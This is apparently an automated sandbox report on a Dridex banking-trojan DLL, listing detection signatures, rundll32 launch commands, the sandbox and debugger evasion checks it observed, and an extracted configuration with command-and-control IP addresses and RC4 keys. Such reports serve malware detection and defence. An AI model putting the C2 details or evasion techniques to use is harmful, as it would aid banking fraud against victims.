Play interactive tour

Edit tour

Analysis Report 4387387b_by_Libranalysis

Overview

General Information

Sample Name:	4387387b_by_Libranalysis (renamed file extension from none to dll)
Analysis ID:	413030
MD5:	4387387bf05810ff7dd9fa82b2bd1526
SHA1:	abfd8f79235b5c501e84f018aad93ddec523fd9f
SHA256:	a2fc3e82334cfa8a09076021c05c55e5dccbe7328d2644c7d87ff9ebaabc23a8
Infos:
Most interesting Screenshot:

Detection

Dridex Dropper

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Dridex dropper found

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Found potential dummy code loops (likely to delay analysis)

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6220 cmdline: loaddll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6228 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6252 cmdline: rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40112, "C2 list": ["107.172.227.10:443", "172.93.133.123:2303", "108.168.61.147:8172"], "RC4 keys": ["AhGDjKatq8OVBsCNBxsJHbQSf84QZXMd170Lw0kGCrK", "ZZ9zhvNgYZKh5HVVVEDNPVdpdSY2d6pJ4ZBqsvPVEDjyOFNIkXQwmhTyNKiurfq"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.rundll32.exe.708c0000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.2.rundll32.exe.708c0000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40112, "C2 list": ["107.172.227.10:443", "172.93.133.123:2303", "108.168.61.147:8172"], "RC4 keys": ["AhGDjKatq8OVBsCNBxsJHbQSf84QZXMd170Lw0kGCrK", "ZZ9zhvNgYZKh5HVVVEDNPVdpdSY2d6pJ4ZBqsvPVEDjyOFNIkXQwmhTyNKiurfq"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 4387387b_by_Libranalysis.dll	Virustotal: Detection: 68%			Perma Link
Source: 4387387b_by_Libranalysis.dll	ReversingLabs: Detection: 87%

Machine Learning detection for sample

Show sources

Source: 4387387b_by_Libranalysis.dll

Joe Sandbox ML: detected

Source: 4387387b_by_Libranalysis.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 4387387b_by_Libranalysis.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.287948712.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.287948712.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: Gsp.pdb source: loaddll32.exe, 00000000.00000002.225373596.00000000708CA000.00000002.00020000.sdmp, 4387387b_by_Libranalysis.dll

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 107.172.227.10:443
Source: Malware configuration extractor	IPs: 172.93.133.123:2303
Source: Malware configuration extractor	IPs: 108.168.61.147:8172

Source: Joe Sandbox View	IP Address: 172.93.133.123 172.93.133.123
Source: Joe Sandbox View	IP Address: 107.172.227.10 107.172.227.10

Source: Joe Sandbox View	ASN Name: NEXEONUS NEXEONUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: START-CA START-CA

E-Banking Fraud:

Dridex dropper found

Show sources

Source: Initial file

Signature Results: Dridex dropper behavior

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.rundll32.exe.708c0000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708D218C NtDelayExecution,	2_2_708D218C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708D2790 NtAllocateVirtualMemory,	2_2_708D2790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708CBC00 NtClose,	2_2_708CBC00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708D07CC	2_2_708D07CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708C1494	2_2_708C1494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708D14D8	2_2_708D14D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708C84E4	2_2_708C84E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708CA5A4	2_2_708CA5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708C9144	2_2_708C9144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708D92DC	2_2_708D92DC

Source: 4387387b_by_Libranalysis.dll

Binary or memory string: OriginalFilenameofl.dllN vs 4387387b_by_Libranalysis.dll

Source: 4387387b_by_Libranalysis.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal92.bank.troj.evad.winDLL@5/0@0/3

Source: 4387387b_by_Libranalysis.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1

Source: 4387387b_by_Libranalysis.dll	Virustotal: Detection: 68%
Source: 4387387b_by_Libranalysis.dll	ReversingLabs: Detection: 87%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1	Jump to behavior

Source: 4387387b_by_Libranalysis.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: 4387387b_by_Libranalysis.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.287948712.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.287948712.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: Gsp.pdb source: loaddll32.exe, 00000000.00000002.225373596.00000000708CA000.00000002.00020000.sdmp, 4387387b_by_Libranalysis.dll

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_708C3A27 push ebp; ret	0_2_708C3A28
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_708C2F56 push ebp; retf	0_2_708C2F61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_708CF744 push esi; mov dword ptr [esp], 00000000h	2_2_708CF745

Source: C:\Windows\SysWOW64\rundll32.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 640

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\self.exE	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\self.exE	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Window / User API: threadDelayed 640

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_708D07CC GetTokenInformation,GetSystemInfo,GetTokenInformation,

2_2_708D07CC

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_708C6DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_708C6DC8

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_708D3060 RtlAddVectoredExceptionHandler,

2_2_708D3060

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4387387b_by_Libranalysis.dll',#1

Jump to behavior

Source: rundll32.exe, 00000002.00000002.494687923.0000000003710000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.494687923.0000000003710000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000002.494687923.0000000003710000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: rundll32.exe, 00000002.00000002.494687923.0000000003710000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000002.00000002.494687923.0000000003710000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_708C6DC8

Source: C:\Windows\SysWOW64\rundll32.exe

2_2_708C6DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion311	OS Credential Dumping	Security Software Discovery22	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion311	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
4387387b_by_Libranalysis.dll	68%	Virustotal		Browse
4387387b_by_Libranalysis.dll	87%	ReversingLabs	Win32.Trojan.Drixed
4387387b_by_Libranalysis.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.rundll32.exe.2df0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.93.133.123	unknown	United States	20278	NEXEONUS	true
107.172.227.10	unknown	United States	36352	AS-COLOCROSSINGUS	true
108.168.61.147	unknown	Canada	40788	START-CA	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	413030
Start date:	13.05.2021
Start time:	06:32:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	4387387b_by_Libranalysis (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.bank.troj.evad.winDLL@5/0@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 55.1% (good quality ratio 51%) Quality average: 76.2% Quality standard deviation: 30.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 19 Number of non-executed functions: 8
Cookbook Comments:	Adjust boot time Enable AMSI

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.93.133.123	88ae0574_by_Libranalysis.dll	Get hash	malicious	Browse
	6c489f0f_by_Libranalysis.dll	Get hash	malicious	Browse
	11560b5f_by_Libranalysis.dll	Get hash	malicious	Browse
	d3caf501_by_Libranalysis.dll	Get hash	malicious	Browse
	0446dbd6_by_Libranalysis.dll	Get hash	malicious	Browse
	d604307c_by_Libranalysis.dll	Get hash	malicious	Browse
	801ae348_by_Libranalysis.dll	Get hash	malicious	Browse
	465a4420_by_Libranalysis.dll	Get hash	malicious	Browse
	e04d2479_by_Libranalysis.dll	Get hash	malicious	Browse
	07060522_by_Libranalysis.dll	Get hash	malicious	Browse
	651c2dd4_by_Libranalysis.dll	Get hash	malicious	Browse
	18e87211_by_Libranalysis.dll	Get hash	malicious	Browse
	c74a9dac_by_Libranalysis.dll	Get hash	malicious	Browse
	f3f12cfd_by_Libranalysis.dll	Get hash	malicious	Browse
	fcb70cbd_by_Libranalysis.dll	Get hash	malicious	Browse
	d67ecdc2_by_Libranalysis.dll	Get hash	malicious	Browse
	6f0c2867_by_Libranalysis.dll	Get hash	malicious	Browse
	6bf25c84_by_Libranalysis.dll	Get hash	malicious	Browse
	3e02fb6c_by_Libranalysis.dll	Get hash	malicious	Browse
	6a5ca060_by_Libranalysis.dll	Get hash	malicious	Browse
107.172.227.10	88ae0574_by_Libranalysis.dll	Get hash	malicious	Browse
	6c489f0f_by_Libranalysis.dll	Get hash	malicious	Browse
	11560b5f_by_Libranalysis.dll	Get hash	malicious	Browse
	d3caf501_by_Libranalysis.dll	Get hash	malicious	Browse
	0446dbd6_by_Libranalysis.dll	Get hash	malicious	Browse
	d604307c_by_Libranalysis.dll	Get hash	malicious	Browse
	801ae348_by_Libranalysis.dll	Get hash	malicious	Browse
	465a4420_by_Libranalysis.dll	Get hash	malicious	Browse
	e04d2479_by_Libranalysis.dll	Get hash	malicious	Browse
	07060522_by_Libranalysis.dll	Get hash	malicious	Browse
	651c2dd4_by_Libranalysis.dll	Get hash	malicious	Browse
	18e87211_by_Libranalysis.dll	Get hash	malicious	Browse
	c74a9dac_by_Libranalysis.dll	Get hash	malicious	Browse
	f3f12cfd_by_Libranalysis.dll	Get hash	malicious	Browse
	fcb70cbd_by_Libranalysis.dll	Get hash	malicious	Browse
	d67ecdc2_by_Libranalysis.dll	Get hash	malicious	Browse
	6f0c2867_by_Libranalysis.dll	Get hash	malicious	Browse
	6bf25c84_by_Libranalysis.dll	Get hash	malicious	Browse
	3e02fb6c_by_Libranalysis.dll	Get hash	malicious	Browse
	6a5ca060_by_Libranalysis.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	88ae0574_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	6c489f0f_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	11560b5f_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	d3caf501_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	0446dbd6_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	d604307c_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	801ae348_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	465a4420_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	e04d2479_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	07060522_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	651c2dd4_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	18e87211_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	c74a9dac_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	f3f12cfd_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	fcb70cbd_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	d67ecdc2_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	6f0c2867_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	6bf25c84_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	3e02fb6c_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	6a5ca060_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
NEXEONUS	88ae0574_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	6c489f0f_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	11560b5f_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	d3caf501_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	0446dbd6_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	d604307c_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	801ae348_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	465a4420_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	e04d2479_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	07060522_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	651c2dd4_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	18e87211_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	c74a9dac_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	f3f12cfd_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	fcb70cbd_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	d67ecdc2_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	6f0c2867_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	6bf25c84_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	3e02fb6c_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
	6a5ca060_by_Libranalysis.dll	Get hash	malicious	Browse	172.93.133.123
START-CA	88ae0574_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	6c489f0f_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	11560b5f_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	d3caf501_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	0446dbd6_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	d604307c_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	801ae348_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	465a4420_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	e04d2479_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	07060522_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	651c2dd4_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	18e87211_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	c74a9dac_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	f3f12cfd_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	fcb70cbd_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	d67ecdc2_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	6f0c2867_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	6bf25c84_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	3e02fb6c_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147
	6a5ca060_by_Libranalysis.dll	Get hash	malicious	Browse	108.168.61.147

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.53490593428646
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4387387b_by_Libranalysis.dll
File size:	165888
MD5:	4387387bf05810ff7dd9fa82b2bd1526
SHA1:	abfd8f79235b5c501e84f018aad93ddec523fd9f
SHA256:	a2fc3e82334cfa8a09076021c05c55e5dccbe7328d2644c7d87ff9ebaabc23a8
SHA512:	05ac23ebb8f993ee0fa5d1390d15ecf5cdd7fb65f35bb2b39356fee56a48a44da808c2d2027710b2a4bcab0656560215b0e8cff383e64d33137df452dcb7f53d
SSDEEP:	3072:ymNFcsGvTmf9vOmoM0IZ5kPjBxYvdIL2KyOQaOP8+cMTH1PxsMYQnF1b1l:jLc7UtOpM1Z5k1xYO2LXjTH1pH5nF1p
File Content Preview:	MZ......................@.......................................b.?.&.Q.&.Q.&.Q.....v.Q.@k..0.Q.+.....Q.8...{.Q./...R.Q./...7.Q..C....Q./...k.Q.@k....Q.&.P...Q..C,.I.Q.H.U...Q.=.....Q..i....Q..n....Q...S.,.Q...U...Q.......Q.Rich&.Q........................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x40974b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x609C7F7C [Thu May 13 01:23:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	987b9d7dc84d935c3675da82d40e06f2

Entrypoint Preview

Instruction
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp edx, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
je 00007FAA3CCCF163h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1001	0x1001	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa71c	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x390	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x640	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa04b	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x88c2	0x8a00	False	0.426007699275	data	5.59277211248	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xa000	0x958	0xa00	False	0.535546875	data	4.25539889565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0xb000	0x2029c	0x1e400	False	0.84991606405	data	7.87197522751	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
